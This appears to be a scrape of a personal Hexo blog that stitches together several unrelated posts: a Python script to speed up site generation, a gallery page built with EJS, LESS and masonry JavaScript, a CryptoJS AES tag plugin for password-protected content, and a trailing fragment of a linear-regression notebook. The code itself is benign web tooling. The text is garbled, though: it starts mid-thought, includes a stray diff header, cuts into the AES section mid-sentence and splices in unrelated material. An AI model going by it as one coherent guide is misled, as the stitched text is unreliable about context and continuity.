This code lets you savor fine traditional Chinese culture in the sidebar, and listen to some music too!
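If the verbose createElement chains feel heavy, the same insertion can be sketched far more compactly with insertAdjacentHTML; this shorthand is my own, not part of the theme:

// Compact alternative sketch: insert a custom card into the sidebar
$(document).ready(function () {
  var card =
    '<div class="poem aside-card">' +
    '  <div class="top"><h1>长安古意</h1><span>唐·卢照邻</span></div>' +
    '  <p>长安大道连狭斜,……</p>' +
    '</div>';
  document.querySelector(".aside-top").insertAdjacentHTML("beforeend", card);
});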

Hexo 写点工具加快 hexo g 的速度

Code

In the blog's root directory, create a ./tools folder, create a quick_complie.py inside it, and fill it with this magic code!


Import libraries and define variables

import os
import shutil
from tqdm import tqdm
import subprocess
import yaml

ignore_folder = ['musics']   # skip the source/musics folder
ignore_type = ['md', 'ejs']  # skip .md and .ejs files

Pre-processing

The code below moves the files under source/ that hexo g does not need to process into temp/.

def move_non_md_files(src, dst):
    os.makedirs(dst, exist_ok=True)
    # Walk every file and sub-folder under the source folder
    for item in os.listdir(src):
        # Full path on the source side
        src_item = os.path.join(src, item)
        # Full path on the destination side
        dst_item = os.path.join(dst, item)

        # Recurse into sub-folders
        if os.path.isdir(src_item):
            move_non_md_files(src_item, dst_item)
        # Move plain files whose extension is not in ignore_type
        elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
            shutil.move(src_item, dst)


print("Processing files...")
if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

for item in tqdm(os.listdir('../source')):
    if item not in ignore_folder:
        item_path = os.path.join('../source', item)
        # Only folders need to be walked
        if os.path.isdir(item_path):
            try:
                move_non_md_files(item_path, os.path.join('../temp', item))
            except Exception as e:
                print(item_path + ":", e)

print("Done!")

          hexo cl & hexo g

Python is used to invoke the hexo cl and hexo g commands.

print("Running hexo cl...")
print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
print("Done!")
print("Running hexo g...")
print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
print("Done!")

Post-processing

The code below copies the files under temp/ back to their corresponding locations under source/ and public/, and finally deletes temp/.

Post-processing _posts

For the files under _posts, the paths in temp/ and public/ do not correspond one-to-one, so they have to be copied according to the matching rule.

print("Post-processing _posts files...")

md_list = []
for item in os.listdir('../source/_posts'):
    if item.endswith('.md'):
        md_list.append(item)

for item in tqdm(md_list):
    try:
        # Read the Markdown file
        with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
            content = file.read()
        # Parse the YAML front matter
        yaml_header, body = content.split('---\n', 2)[1:]
        yaml_data = yaml.safe_load(yaml_header)
        source_folder = '../temp/_posts/' + item[:-3]
        # Hexo publishes a post's assets under public/<year>/<month>/<day>/<post name>/
        destination_folder = ('../public/' +
                              str(yaml_data['date'].year).zfill(2) + '/' +
                              str(yaml_data['date'].month).zfill(2) + '/' +
                              str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
        shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
    except Exception as e:
        print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): " + item + ":", e)
    try:
        # Also copy the assets back into source/_posts so nothing is lost
        shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
    except Exception as e:
        print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
print("Done!")

Post-processing the other files

For the files outside _posts, the temp/ and public/ paths do correspond one-to-one, so they are simply copied straight back. Finally, the temporary temp/ folder is deleted.

print("Post-processing the other files...")
for item in tqdm(os.listdir('../temp')):
    if item != '_posts' and item not in ignore_folder:
        item_path = os.path.join('../temp', item)
        # Only folders need to be walked
        if os.path.isdir(item_path):
            try:
                shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
            except Exception as e:
                print(os.path.join('../public', item) + ":", e)
            try:
                # Copy back into source/ as well, restoring what was moved out
                shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
            except Exception as e:
                print(os.path.join('../source', item) + ":", e)

if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

print("Done!")

Complete code

import os
import shutil
from tqdm import tqdm
import subprocess
import yaml

ignore_folder = ['musics']
ignore_type = ['md', 'ejs']


def move_non_md_files(src, dst):
    os.makedirs(dst, exist_ok=True)
    # Walk every file and sub-folder under the source folder
    for item in os.listdir(src):
        src_item = os.path.join(src, item)
        dst_item = os.path.join(dst, item)

        # Recurse into sub-folders
        if os.path.isdir(src_item):
            move_non_md_files(src_item, dst_item)
        # Move plain files whose extension is not in ignore_type
        elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
            shutil.move(src_item, dst)


print("Processing files...")
if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

for item in tqdm(os.listdir('../source')):
    if item not in ignore_folder:
        item_path = os.path.join('../source', item)
        if os.path.isdir(item_path):
            try:
                move_non_md_files(item_path, os.path.join('../temp', item))
            except Exception as e:
                print(item_path + ":", e)

print("Done!")

#####################################################

print("Running hexo cl...")
print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
print("Done!")
print("Running hexo g...")
print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
print("Done!")

######################################################

## Post-process _posts files

print("Post-processing _posts files...")

md_list = []
for item in os.listdir('../source/_posts'):
    if item.endswith('.md'):
        md_list.append(item)

for item in tqdm(md_list):
    try:
        with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
            content = file.read()
        yaml_header, body = content.split('---\n', 2)[1:]
        yaml_data = yaml.safe_load(yaml_header)
        source_folder = '../temp/_posts/' + item[:-3]
        destination_folder = ('../public/' +
                              str(yaml_data['date'].year).zfill(2) + '/' +
                              str(yaml_data['date'].month).zfill(2) + '/' +
                              str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
        shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
    except Exception as e:
        print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): " + item + ":", e)
    try:
        shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
    except Exception as e:
        print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
print("Done!")

## Post-process the other files

print("Post-processing the other files...")
for item in tqdm(os.listdir('../temp')):
    if item != '_posts' and item not in ignore_folder:
        item_path = os.path.join('../temp', item)
        if os.path.isdir(item_path):
            try:
                shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
            except Exception as e:
                print(os.path.join('../public', item) + ":", e)
            try:
                shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
            except Exception as e:
                print(os.path.join('../source', item) + ":", e)

if os.path.isdir('../temp'):
    shutil.rmtree('../temp')

print("Done!")

Calling the Python file

Write a .bat file to run quick_complie.py quickly:

@echo off
python quick_complie.py
echo Press any key to continue...
pause
exit
diff --git "a/posts/Hexo-\345\215\232\345\256\242\347\233\270\345\206\214\345\212\237\350\203\275\347\232\204\345\274\200\345\217\221/index.html" "b/posts/Hexo-\345\215\232\345\256\242\347\233\270\345\206\214\345\212\237\350\203\275\347\232\204\345\274\200\345\217\221/index.html"

Preface

Main text

Creating the sub-link

In the source folder of the Hexo project, create a galleries folder and put an index.md inside it (the command line works too):

hexo new page gallery

When the blog is rendered, the /galleries URL is rendered as well, e.g. 相册-Zi-Zi’s Journey.


Likewise, if you put further folders inside galleries, each with its own index.md, the next level of URLs is rendered too, e.g. …/…/…/…/galleries/研究生.
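The layout under source/ then looks roughly like this:

source/
└── galleries/
    ├── index.md          # rendered as /galleries
    └── 研究生/
        └── index.md      # rendered as /galleries/研究生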


The album entry

With the sub-links in place, the entry point has to be set up as well, usually in the theme's _config.yml.

# Navigation labels
menus_title:
  home: 主页
  archives: 统计
  categories: 类别
  tags: 标签
  galleries: 相册
  links: 链接
  about: 关于

# Navigation targets
menus:
  home: /
  archives: /archives
  categories: /categories
  tags: /tags
  galleries: /galleries
  links: /links
  about: /about

After rendering, the navigation bar gains a 相册 (album) item, and clicking it correctly leads to /galleries.


Set the other page-related parameters too:

# Icon and tagline shown on each page
headers:
  home: {
    message: "居然被你找到了这里!",
    icon: "/images/logo.png",
    cover: "#f5f9fd"
  }
  archives: {
    # The variables { year, number } are substituted here; they can also be omitted
    message: "居然用了 year 年一共才写了 number 篇文章!",
    icon: "/images/archives.svg",
    cover: "#f5f9fd"
  }
  categories: {
    message: "好像也没分几类",
    icon: "/images/categories.svg",
    cover: "#f5f9fd"
  }
  tags: {
    message: "这里是一些展示的标签",
    icon: "/images/tags.svg",
    cover: "#f5f9fd"
  }
  galleries: {
    message: "有趣的相册~(施工中)",
    icon: "/images/galleries.svg",
    cover: "#f5f9fd"
  }
  links: {
    message: "给我读过的学校递一杯卡布奇诺~",
    icon: "/images/links.svg",
    cover: "#f5f9fd"
  }

Hand-draw an icon in a matching style:


Creating the album page layout

Edit the index.md you created; its front matter is written in YAML:

title: 相册
date: 2023-12-29 09:46:29
type: galleries
layout: galleries

With my own theme as the example, this says the page will be rendered with the galleries layout.

I designed two kinds of pages:


galleries design

            index.md

Define variables in the index.md that uses the galleries layout; galleries.ejs reads them as page.XXX:

title: 相册
date: 2023-12-29 09:46:29
type: galleries
layout: galleries
layout_style: block
comments: false
galleries:
  - {title: "研究生", description: "Tell me 他乡的困难会不会比它鼓山高?", cover: "/images/gallery_covers/研究生.jpg"}
  - {title: "本科", description: "闽江江水都流向,流向长乐的海……", cover: "/images/gallery_covers/本科.jpg"}
  - {title: "小时候", description: "我让过去的自己只留在,安静的白马河。", cover: "/images/gallery_covers/小时候.jpg"}
• title — the page title
• date — the date, though I don't actually use it here

              galleries.ejs

The content of galleries.ejs is roughly as follows. (After changing galleries.ejs the blog must be regenerated before the page re-renders; if that makes debugging awkward, you can jump out to another file with <%- partial('_partial/XXX') %> for easier debugging.)

<%- partial('_partial/header',{name:'galleries'}) %>

<div class="galleries">
  <%- partial('_widget/header_body',{message: page.headers ? page.headers : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
  <div class="main">
    <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>" id="content">
      <% page.galleries.forEach(function(item) { %>
      <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>-content">
        <a class="img-container" href="<%= item.title %>">
          <div class="photo-frames">
            <img style="<%- item.cover_style || '' %>" src="<%= item.cover ? item.cover : theme.default_cover %>" alt="Cover">
          </div>
          <p class="title"><%= item.title %></p>
        </a>
        <div class="description-container"><p><%= item.description %></p></div>
      </div>
      <% }); %>
      <div id="gitalk-container"></div>
    </div>
  </div>
</div>

It is simply the logic that displays the information read from the front matter on the page.

              galleries.less

Create and write the matching galleries.less as follows (remember to import it somewhere):

.galleries {
  .main {
    display: flex;
    flex-grow: 1;
    flex-basis: auto;
    flex-direction: column;
    margin-top: -64px;
    .post-block {
      padding: 0 calc((100% - 1160px)/2);
      margin-bottom: 50px;
      &-content {
        margin: 20px 100px 60px 100px;
        text-decoration: none;
        height: 240px;
        justify-content: center; /* centers the children horizontally */
        display: grid;
        grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
        grid-gap: 10px; /* gap between child containers */
        position: relative;
        top: 0px;
        transition: all .5s ease-in-out;
        -moz-transition: all .5s;
        -webkit-transition: all .5s;
        -o-transition: all .5s;
        &:hover {
          top: -15px;
        }
        .img-container {
          justify-content: center;
          display: flex;
          transform: rotate(-5deg);
          transition: transform ease-in-out 0.5s;
          &:hover {
            transform: rotate(-10deg);
          }
          .photo-frames {
            width: 200px;
            border: 10px solid #FFF; /* photo-frame border style and color */
            border-radius: 5px;
            background: #FFF;
            box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
            img {
              border-radius: 2px;
              margin-top: 10px;
              width: 100%;
              height: 75%;
              object-fit: cover;
            }
          }
        }
        .title {
          bottom: 15px;
          position: absolute;
          font-weight: bold;
          text-decoration: none;
          color: @textColorTheme;
          font-size: 22px;
          font-weight: 500;
        }
        .description-container {
          margin-top: 80px;
          p {
            text-indent: 2em;
            font-size: 20px;
            position: absolute;
          }
        }
      }
      @media screen and (max-width:660px) {
        &-content {
          margin: 20px;
          padding: 20px;
          .title {
            bottom: 5%;
          }
          .description-container {
            p {
              font-size: 18px;
            }
          }
        }
      }
      @media screen and (max-width:489px) {
        &-content {
          height: 320px;
          margin-bottom: 40px;
          .img-container {
            .photo-frames {
              width: 60vw;
            }
          }
          .description-container {
            margin-top: 40px;
          }
        }
      }
    }

    .post-card {
      display: flex;
      max-width: 100%;
      padding: 0 calc((100% - 1200px)/2) 40px;
      flex-wrap: wrap;
      justify-content: center;
      align-items: stretch;
      margin-top: -64px;
      &-content {
        margin: 20px 40px 80px 40px;
        text-decoration: none;
        height: 400px;
        justify-content: center; /* centers the children horizontally */
        display: grid;
        grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
        grid-gap: 10px; /* gap between child containers */
        position: relative;
        top: 0px;
        transition: all .5s ease-in-out;
        -moz-transition: all .5s;
        -webkit-transition: all .5s;
        -o-transition: all .5s;
        &:hover {
          top: -15px;
        }
        .img-container {
          justify-content: center;
          display: flex;
          transform: rotate(-5deg);
          transition: transform ease-in-out 0.5s;
          &:hover {
            transform: rotate(-10deg);
          }
          .photo-frames {
            width: 220px;
            border: 10px solid #FFF; /* photo-frame border style and color */
            border-radius: 5px;
            background: #FFF;
            box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
            img {
              border-radius: 2px;
              margin-top: 10px;
              width: 100%;
              height: 75%;
              object-fit: cover;
            }
          }
        }
        .title {
          bottom: 20px;
          position: absolute;
          font-weight: bold;
          text-decoration: none;
          color: @textColorTheme;
          font-size: 22px;
          font-weight: 500;
        }
        .description-container {
          margin-top: 40px;
          p {
            text-indent: 2em;
            font-size: 20px;
            position: absolute;
          }
        }
      }

      @media screen and (max-width:640px) {
        &-content {
          margin: 80px 20px;
          padding: 20px;
          height: 400px;
          .title {
            bottom: 5%;
          }
          .img-container {
            .photo-frames {
              width: 60vw;
            }
          }
          .description-container {
            p {
              font-size: 18px;
            }
          }
        }
      }
    }
  }
}

Demo

All done! The corresponding block-style page: 相册-Zi-Zi’s Journey


The front matter of \研究生\index.md:

title: 研究生
date: 2023-12-29 14:47:00
type: galleries
layout: galleries
layout_style: card
headers: 大河之北
galleries:
  - {title: "福州", description: "WAIYA! 鼓山脚 南门兜 我如鱼得水", cover: "/images/gallery_covers/研究生/福州.jpg"}
  - {title: "保定-春夏", description: "保定没有爱情,只有他蜡笔还不完的饥荒。", cover: "/images/gallery_covers/研究生/保定-春夏.jpg"}
  - {title: "保定-秋冬", description: "雪花飘飘,北风萧萧。", cover: "/images/gallery_covers/研究生/保定-秋冬.jpg"}
  - {title: "石家庄", description: "直到大厦崩塌", cover: "/images/gallery_covers/研究生/石家庄.jpg"}
  - {title: "厦门", description: "再鼓楼润湖里搞涢涢!", cover: "/images/gallery_covers/研究生/厦门.jpg"}
  - {title: "武汉", description: "这辈子又可以见到小迷糊了!", cover: "/images/gallery_covers/研究生/武汉.jpg"}
  - {title: "雄安", description: "千年大计,国家大事。", cover: "/images/gallery_covers/研究生/雄安.jpg"}
  - {title: "天津", description: "天天乐道,津津有味。", cover: "/images/gallery_covers/研究生/天津.jpg"}
  - {title: "正定", description: "太能走了凡哥!", cover: "/images/gallery_covers/研究生/正定.jpg"}

The corresponding card-style page:

• 研究生-Zi-Zi’s Journey

Demo

                index.md

Similarly, define variables in the index.md that uses the gallery layout; gallery.ejs reads them as page.XXX:

title: 保定-秋冬
date: 2023-12-29 14:47:00
type: gallery
layout: gallery
description: 你们南方人的四季是不完整的。——阿杰
imgs:
  - {title: "积雪的人行道", src: ../../../XXX.jpg}
  - ...
  - {title: "和美保定", src: ../../../XXX.jpg}
comments: true
• title — the image title

The imgs list can be generated with a small script that walks the post's asset folder:

import os

for file in os.listdir(r'D:\Study\GzBlog-Github\source\_posts\Diary-浙了(二)'):
    print(' ' + r'- {title: "XXX", src: /2024/02/26/Diary-浙了(二)/' + file + '}')

                  gallery.ejs

These variables are then used inside gallery.ejs:


• A description-container is designed to hold the description of an image.
• <script>var lazyLoad = <%= theme.lazyload %></script><%- js('js/gallery.js') %> seems to be a workable way of passing a parameter from EJS to JS.
<%- partial('_partial/header',{name:'galleries'}) %>
<%- partial('_widget/header_body',{message: page.description ? page.description : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
<%- js('js/masonry.pkgd.js') %>
<%- js('js/imagesloaded.pkgd.js') %>
<style> *{ box-sizing: border-box; } </style>

<div class="gallery-content">
  <div class="grid">
    <div class="grid-sizer"></div>
    <% if (page.imgs && page.imgs.length > 0) { %>
    <% page.imgs.forEach(function(item) { %>
    <div class="grid-item">
      <a href="<%- item.src %>"
         title="<%- item.title %>"
         data-src="<%- item.src %>"
         class="fancybox"
         data-fancybox="fancybox-gallery-img"
         rel="article">
        <img src="<%- item.src %>" alt="<%- item.title %>" />
      </a>
    </div>
    <% }) %>
    <% } %>
  </div>
  <div style="width: 100%; height: 20px;"></div>
  <div class="description-container"><span></span></div>
  <div style="width: 100%; height: 20px;"></div>
  <div id="gitalk-container"></div>
</div>

<script>var lazyLoad = <%= theme.lazyload %></script>
<%- js('js/gallery.js') %>

                  gallery.less

Similarly, create and write the matching gallery.less as follows:

.gallery-content {
  width: 100%;
  padding: 2px 0;
  max-width: 1200px;
  margin: -64px auto auto auto;
  border-radius: 10px;
  background: #FFF;

  .grid:after {
    content: '';
    display: block;
    clear: both;
  }

  .grid-sizer,
  .grid-item {
    width: 33%;
  }

  .grid-item {
    float: left;
    padding: 10px;
  }

  .grid-item img {
    display: block;
    max-width: 100%;
    border-radius: 10px;
  }

  .fancybox:hover {
    z-index: 2;
    transform: scale(1.1);
  }

  .description-container {
    z-index: 2;
    position: sticky;
    width: 100%;
    left: 0;
    right: 0;
    height: 40px;
    bottom: 0;
    background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 255, 255, 0.9), rgba(255, 255, 255, 0.9), rgba(0, 0, 0, 0));
    text-align: center;
    flex-direction: column;
    align-items: center;

    span {
      font-size: 18px;
      color: #12183A;
      text-shadow: 0 0 10px rgba(128, 128, 128, 0.8);
      position: absolute;
      bottom: 50%;
      left: 50%;
      transform: translate(-50%, 50%);
    }
  }

  // On narrow screens (e.g. mobile), show a single column
  @media screen and (max-width: 660px) {
    .grid-sizer,
    .grid-item {
      width: 100%;
    }
  }
}

                  gallery.js

                  function initGallery()

Because lazy loading is enabled, $grid.masonry(); has to be executed whenever an image finishes loading so the layout is refreshed.

function initGallery()
{
    var $grid = $('.grid').masonry({
        itemSelector: '.grid-item',
        percentPosition: true,
        columnWidth: '.grid-sizer'
    });
    if (lazyLoad)
    {
        window.imageLazyLoadSetting = {
            onImageLoaded: function() {
                $grid.masonry();
            }
        };
    }
    else
    {
        // layout Masonry after each image loads
        $grid.imagesLoaded().progress(function() {
            $grid.masonry();
        });
    }
    galleryBottom();
}

$(document).ready(function() {
    initGallery();
});

                  function galleryBottom()

The JavaScript code is as follows:

• On mobile, grab the title of the image currently in the middle of the screen and show it in the bottom bar.
• On desktop, when the mouse hovers over an image, show that image's title in the bottom bar.
function galleryBottom() {
  if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
    var descriptionContainer = document.querySelector('.description-container span');
    // refresh the caption whenever the page scrolls
    document.addEventListener("scroll", function () {
      var title = getBottomTitle();
      descriptionContainer.textContent = title || '';
    });
  } else {
    var galleryContent = document.querySelector('.grid');
    var descriptionContainer = document.querySelector('.description-container span');

    galleryContent.addEventListener('mouseover', function(event) {
      if (event.target.tagName.toLowerCase() === 'img') {
        var title = event.target.getAttribute('alt');
        descriptionContainer.textContent = title;
      }
    });

    galleryContent.addEventListener('mouseout', function(event) {
      if (event.target.tagName.toLowerCase() === 'img') {
        descriptionContainer.textContent = '';
      }
    });
  }

  // find the lowest image fully visible in the viewport and return its title
  function getBottomTitle() {
    var elements = document.querySelectorAll('.fancybox');
    var viewportHeight = window.innerHeight;
    var bottomElement = null;
    for (var i = 0; i < elements.length; i++) {
      var rect = elements[i].getBoundingClientRect();
      if (rect.bottom <= viewportHeight && (!bottomElement || rect.bottom > bottomElement.rect.bottom)) {
        bottomElement = {
          element: elements[i],
          rect: rect
        };
      }
    }
    if (bottomElement) {
      return bottomElement.element.title;
    }
  }
}

Demo

All done! Here is a demo of the waterfall-flow gallery:

…and the public key that comes out is not even the same from run to run…

Decrypt with AES:

CryptoJS.AES.decrypt(pubkey, privkey).toString(CryptoJS.enc.Utf8);

If the public key and private key match, the content is returned correctly; if not, an empty string comes back.

Sometimes decryption fails with Error: Malformed UTF-8 data — see javascript - Why I get Malformed UTF-8 data error on crypto-js? - Stack Overflow… I'm not sure exactly what triggers it either; double-check the code a few times for mistakes. A small round-trip sketch follows.
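As a quick sanity check, here is a minimal round-trip sketch (assuming only that CryptoJS is loaded; the message and passwords are made-up examples). It shows why the public key differs between runs — CryptoJS salts each passphrase-based encryption — and how a wrong private key surfaces as either an empty string or the Malformed UTF-8 exception:

var msg = 'Hello world!';                         // made-up plaintext
var c1 = CryptoJS.AES.encrypt(msg, '123').toString();
var c2 = CryptoJS.AES.encrypt(msg, '123').toString();
console.log(c1 === c2);                           // false: a random salt makes each ciphertext unique

try {
  var plain = CryptoJS.AES.decrypt(c1, 'wrong').toString(CryptoJS.enc.Utf8);
  console.log(plain === '');                      // usually true: a wrong key decodes to an empty string
} catch (e) {
  console.log(e.message);                         // sometimes thrown instead: "Malformed UTF-8 data"
}

Both ciphertexts still decrypt to the same plaintext under the correct key, which is why the non-unique public key is harmless here.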


Good — we now have the conversion logic between content, public key, and private key down. If the content string is a piece of HTML, we can render it.

Building on this, we can use jQuery to define an AESContainer class that implements our post-encryption plugin:

class AESContainer {
  constructor(label, pubkey) {
    this.pubkey = pubkey;
    this.container = $('<div>').addClass('AES-container');
    this.inputContainer = $('<div>').addClass('AES-input');
    this.inputField = $('<input>').attr({type: 'password', required: true});
    this.highlight = $('<span>').addClass('hl');
    this.bar = $('<span>').addClass('bar');
    this.label = $('<label>').text(label);

    this.inputContainer.append(this.inputField, this.highlight, this.bar, this.label);
    this.container.append(this.inputContainer);

    this.inputField.on('keypress', this.handleKeyPress.bind(this));
  }

  handleKeyPress(event) {
    if (event.key === 'Enter') {
      this.decrypted = CryptoJS.AES.decrypt(this.pubkey, this.inputField.val()).toString(CryptoJS.enc.Utf8);
      if (this.decrypted) {
        this.inputContainer.remove();
        this.container.append($(this.decrypted));
      }
    }
  }

  render() {
    $(document.currentScript).before(this.container);
  }
}

Then design borrow a good-looking stylesheet:

.AES-container {
  border: 2px solid var(--border);
  margin: 10px auto;
  padding: 10px 20px;
  width: 100%;
  box-sizing: border-box;
  transition: border 0.5s ease-in-out;
}

/* form starting stylings ------------------------------- */
.AES-container .AES-input {
  position: relative;
  margin: 20px 0 10px;
  box-sizing: border-box;
}

.AES-input input {
  font-size: 16px;
  padding: 5px 2px;
  display: block;
  width: calc(100% - 4px);
  border: none;
  border-bottom: 2px solid var(--border);
  background: none;
  color: var(--text-primary);
  transition: color 0.5s ease-in-out, border 0.5s ease-in-out;
}

.AES-input input:focus {
  outline: none;
}

/* LABEL ======================================= */
.AES-input label {
  color: var(--text-secondary);
  font-size: 16px;
  font-weight: normal;
  position: absolute;
  pointer-events: none;
  top: -5px;
  transition: 0.2s ease all;
  -moz-transition: 0.2s ease all;
  -webkit-transition: 0.2s ease all;
}

/* active state */
.AES-input input:focus~label,
.AES-input input:valid~label {
  top: -20px;
  font-size: 14px;
  color: var(--text-link);
}

/* BOTTOM BARS ================================= */
.AES-input .bar {
  position: relative;
  display: block;
  width: 100%;
}

.AES-input .bar:before,
.AES-input .bar:after {
  content: '';
  height: 2px;
  width: 0;
  transform: translateY(-2px);
  position: absolute;
  background: var(--text-link);
  transition: 0.2s ease all;
  -moz-transition: 0.2s ease all;
  -webkit-transition: 0.2s ease all;
}

.AES-input .bar:before {
  left: 50%;
}

.AES-input .bar:after {
  right: 50%;
}

/* active state */
.AES-input input:focus~.bar:before,
.AES-input input:focus~.bar:after {
  width: 50%;
}

/* hlER ================================== */
.AES-input .hl {
  position: absolute;
  height: 60%;
  width: 100px;
  top: 25%;
  left: 0;
  pointer-events: none;
  opacity: 0.5;
}

/* active state */
.AES-input input:focus~.hl {
  -webkit-animation: inputhler 0.3s ease;
  -moz-animation: inputhler 0.3s ease;
  animation: inputhler 0.3s ease;
}

/* ANIMATIONS ================ */
@-webkit-keyframes inputhler {
  from {
    background: var(--text-link);
  }

  to {
    width: 0;
    background: transparent;
  }
}

@-moz-keyframes inputhler {
  from {
    background: var(--text-link);
  }

  to {
    width: 0;
    background: transparent;
  }
}

@keyframes inputhler {
  from {
    background: var(--text-link);
  }

  to {
    width: 0;
    background: transparent;
  }
}

With this in place, the following snippet:

<script>
new AESContainer('label text', 'pubkey').render();
</script>

creates and renders a password-input prompt right before the <script> tag:

<div class="AES-container">
  <div class="AES-input">
    <input type="password" required="required">
    <span class="hl"></span>
    <span class="bar"></span>
    <label>label text</label>
  </div>
</div>

Wonderful! Now we need the backend to generate the public key for us automatically.

Backend

With the help of 标签插件(Tag)| Hexo, write the following in Markdown:

{% AES '123','密码是"123"~' %}
Hello world!
{% endAES %}

After Hexo renders the post, the tag is expanded into:

<script>new AESContainer('密码是"123"~', 'U2FsdGVkX1+LNox3Pwx7PH6x6yoSjddDb1gcOrYcFddHTHX/6AEXT0VTZUI1nhN5').render();</script>

And that's it!

Run the following command in the Hexo project root to install crypto-js:

npm install crypto-js

Create a file named AES.js in the scripts folder of the Hexo project, containing the tag-expansion logic:

'use strict'

var CryptoJS = require("crypto-js");

const parseArgs = args => {
  return args.join(' ').split(',')
}

const AESFn = (args, content) => {
  const [password = "", label = '这里的内容需要输入密码才能查看~'] = parseArgs(args)
  content = hexo.render.renderSync({ text: content, engine: 'markdown' });
  if (password == "") {
    return content;
  } else {
    const pubkey = CryptoJS.AES.encrypt(content, password).toString();
    const result = `<script>new AESContainer('${label}', '${pubkey}').render();</script>`;
    return result;
  }
}

hexo.extend.tag.register('AES', AESFn, { ends: true })
• const [password = "", label = '这里的内容需要输入密码才能查看~'] = parseArgs(args) pulls out the arguments. For the tag:

  {% AES '123','密码是"123"~' %}

  • password is the configured password, 123.
  • label is the prompt text, 密码是"123"~; if it is empty, the default 这里的内容需要输入密码才能查看~ is used. Note that there must be no space after the comma — see the sketch after this list.
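A minimal sketch of what parseArgs does with the raw tokens (assuming, for illustration, that Hexo hands the tag arguments over as space-separated tokens; the sample input is made up):

const parseArgs = args => {
  return args.join(' ').split(',')
}

// no space around the comma: the whole argument arrives as a single token
console.log(parseArgs(['123,密码是"123"~'])); // [ '123', '密码是"123"~' ]

// a space after the comma would split the label into a second token; the
// re-joined string '123, 密码是"123"~' then leaves a stray leading space on the label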

Try It Out

念桥边红药

Enter the password promefire in the box below to reveal promefire's favorite line of poetry!

{% AES 'promefire','密码是"promefire"~' %}
<marquee behavior="scroll" direction="right" scrollamount="15"><font color="red" size="4px">念桥边红药,年年知为谁生?</font></marquee>
{% endAES %}

                      大故宫

Enter the password 12345678 in the box below and enjoy 大故宫!

{% AES '12345678','密码是"12345678"~' %}
![人去楼不空 往昔的叱咤化作春色满园](/2024/05/20/Diary-老儿北儿京儿/1435.webp)
<center>人去楼不空 往昔的叱咤化作春色满园</center>
{% endAES %}

Note: after decryption, the revealed content may need the page's initialization functions to be re-run before it displays exactly like unencrypted content! A sketch of one way to wire that up follows.
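A minimal sketch (the hook name themeInit is hypothetical — substitute whatever initializers the theme actually exposes, e.g. code highlighting, lazy loading, or fancybox setup): the handleKeyPress method of AESContainer above, extended to re-run initializers right after the decrypted HTML is appended:

handleKeyPress(event) {
  if (event.key === 'Enter') {
    this.decrypted = CryptoJS.AES.decrypt(this.pubkey, this.inputField.val()).toString(CryptoJS.enc.Utf8);
    if (this.decrypted) {
      this.inputContainer.remove();
      this.container.append($(this.decrypted));
      // hypothetical theme hook: re-initialize the freshly inserted nodes
      if (typeof window.themeInit === 'function') window.themeInit(this.container);
    }
  }
}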
def compute_cost(x, y, w, b):
    """
    Computes the cost function for linear regression.

    Args:
      x (ndarray (m,)): Data, m examples
      y (ndarray (m,)): target values
      w,b (scalar)    : model parameters

    Returns
      total_cost (float): The cost of using w,b as the parameters for linear regression
                          to fit the data points in x and y
    """
    # number of training examples
    m = x.shape[0]

    cost_sum = 0
    for i in range(m):
        f_wb = w * x[i] + b
        cost = (f_wb - y[i]) ** 2
        cost_sum = cost_sum + cost
    total_cost = (1 / (2 * m)) * cost_sum

    return total_cost

                    Cost Function Intuition

                    Your goal is to find a model $f_{w,b}(x) = wx + b$, with parameters $w,b$, which will accurately predict house values given an input $x$. The cost is a measure of how accurate the model is on the training data.
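For reference, the cost that compute_cost implements above is the standard squared-error cost:

$$J(w,b) = \frac{1}{2m} \sum_{i=0}^{m-1} \left( f_{w,b}(x^{(i)}) - y^{(i)} \right)^2, \qquad f_{w,b}(x^{(i)}) = w x^{(i)} + b$$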



Nothing comes out at all, orz

plt_intuition(x_train,y_train)
                    interactive(children=(IntSlider(value=150, description='w', max=400, step=10), Output()), _dom_classes=('widge…
                     

                    The plot contains a few points that are worth mentioning.


                    Larger Data Set

It is instructive to view a scenario with a few more data points. This data set includes data points that do not fall on the same line. What does that mean for the cost equation? Can we find $w$ and $b$ that will give us a cost of 0?

x_train = np.array([1.0, 1.7, 2.0, 2.5, 3.0, 3.2])
y_train = np.array([250, 300, 480, 430, 630, 730])

